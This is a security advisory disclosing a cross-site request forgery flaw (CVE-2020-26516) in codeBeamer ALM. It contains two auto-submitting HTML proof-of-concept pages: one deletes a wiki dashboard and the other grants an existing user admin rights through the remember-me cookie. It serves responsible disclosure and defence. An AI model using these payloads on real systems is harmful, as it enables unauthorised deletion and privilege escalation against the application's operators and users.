#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  codeBeamer Application Lifecycle Management (ALM) [1]
# Vendor:   Intland Software
# CSNC ID:  CSNC-2020-009
# CVE ID:   CVE-2020-26516
# Subject:  Cross-Site Request Forgery (CSRF)
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Alex Joss and Emanuele Barbeno (advisories@compass-security.com)
# Date:     02.06.2021
#
#############################################################

Introduction:
-------------
codeBeamer Application Lifecycle Management (ALM) provides Project-, Task-, 
Requirement-, Test- Change-, Configuration-, Build-, Knowledge- and Document 
management in a single, secure environment. It enables software and hardware 
development to be more collaborative, transparent and productive. [2]

Requests sent to the server that trigger actions do not contain a CSRF token 
and can therefore be entirely predicted allowing attackers to cause the victim's 
browser to execute undesired actions in the web application through crafted 
requests. [3]

Affected:
---------
Vulnerable:
	10.0.0-final
	21.04-final

No other version was tested, but it is believed for the older versions to be 
vulnerable as well.

Technical Description
---------------------

Requests do not include Anti-CSRF tokens. Therefore, an attacker can guess
entire requests. Abusing this via prepared links/forms allows them to make
logged-in users execute actions unintendedly in the application.

Since the session cookie has the Same-Site flag set to Lax, CSRF attacks 
with the session cookie work only with GET requests. 
However, the remember-me cookie does not have the Same-Site flag set, thus 
if the victim has the remember-me cookie set, CSRF attacks work with GET 
and POST requests.

For instance, the following Proof of Concept code can be used to delete 
the dashboard with ID 400440 sending a GET request using the victim's 
session cookie:
```
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://[CUT-BY-COMPASS]/cb/proj/wiki/deleteWikiPage.spr">
      <input type="hidden" name="doc&#95;id" value="400440" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```

And the following Proof of Concept code can be used to assing admin rights 
(groupId 1000) to an existing user with ID 262 sending a POST request using 
the victim's remember-me cookie:
```
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://[CUT-BY-COMPASS]/cb/updateUser.spr?user_id=262" 
		method="POST">
      <input type="hidden" name="user&#46;id" value="262" />
      <input type="hidden" name="referrerURL" value="https&#58;&#47;&#47;
			[CUT-BY-COMPASS]&#47;cb&#47;userdata&#47;262" />
      <input type="hidden" name="encryptionRequest" value="false" />
      <input type="hidden" name="user&#46;name" value="test&#45;compass" />
      <input type="hidden" name="user&#46;password" value="&#46;&#44;&#35;
			&#42;&#91;&#93;&#59;&#58;" />
      <input type="hidden" name="password2" value="&#46;&#44;&#35;&#42;
			&#91;&#93;&#59;&#58;" />
      <input type="hidden" name="user&#46;title" value="" />
      <input type="hidden" name="user&#46;firstName" value="test" />
      <input type="hidden" name="user&#46;lastName" value="compass" />
      <input type="hidden" name="user&#46;email" value="[CUT-BY-COMPASS]" />
      <input type="hidden" name="user&#46;phone" value="" />
      <input type="hidden" name="user&#46;mobile" value="" />
      <input type="hidden" name="user&#46;company" value="" />
      <input type="hidden" name="user&#46;address" value="" />
      <input type="hidden" name="user&#46;city" value="" />
      <input type="hidden" name="user&#46;zip" value="" />
      <input type="hidden" name="user&#46;state" value="" />
      <input type="hidden" name="user&#46;country" value="" />
      <input type="hidden" name="user&#46;language" value="en" />
      <input type="hidden" name="userLicense" value="ALM" />
      <input type="hidden" name="userLicenseType&#91;ALM&#93;" value="2" />
      <input type="hidden" name="user&#46;status" value="activated" />
      <input type="hidden" name="user&#46;downloadLimit" value="&#45;1" />
      <input type="hidden" name="user&#46;skills" value="" />
      <input type="hidden" name="&#95;groupId" value="on" />
      <input type="hidden" name="groupId" value="1002" />
      <input type="hidden" name="&#95;groupId" value="on" />
      <input type="hidden" name="&#95;groupId" value="on" />
      <input type="hidden" name="&#95;groupId" value="on" />
      <input type="hidden" name="&#95;groupId" value="on" />
      <input type="hidden" name="&#95;groupId" value="on" />
      <input type="hidden" name="&#95;groupId" value="on" />
      <input type="hidden" name="groupId" value="1000" />
      <input type="hidden" name="&#95;groupId" value="on" />
      <input type="hidden" name="user&#46;timeZonePattern" value="Europe
			&#47;Berlin" />
      <input type="hidden" name="user&#46;dateFormatPattern" value="MMM
			&#32;dd&#32;yyyy" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

```

Workaround / Fix:
-----------------
Use CSRF tokens to prevent CSRF attacks.

Timeline:
---------
2020-05-14:     Discovery by Alex Joss and Emanuele Barbeno
2020-05-18:     Initial vendor notification
2020-05-18:     Initial vendor response
2020-10-02:     Assigned CVE-2020-26516
2021-06-02:     Public disclosure


References:
-----------
[1] https://intland.com/codebeamer/application-lifecycle-management/
[2] https://codebeamer.com/cb/wiki/199594
[3] https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html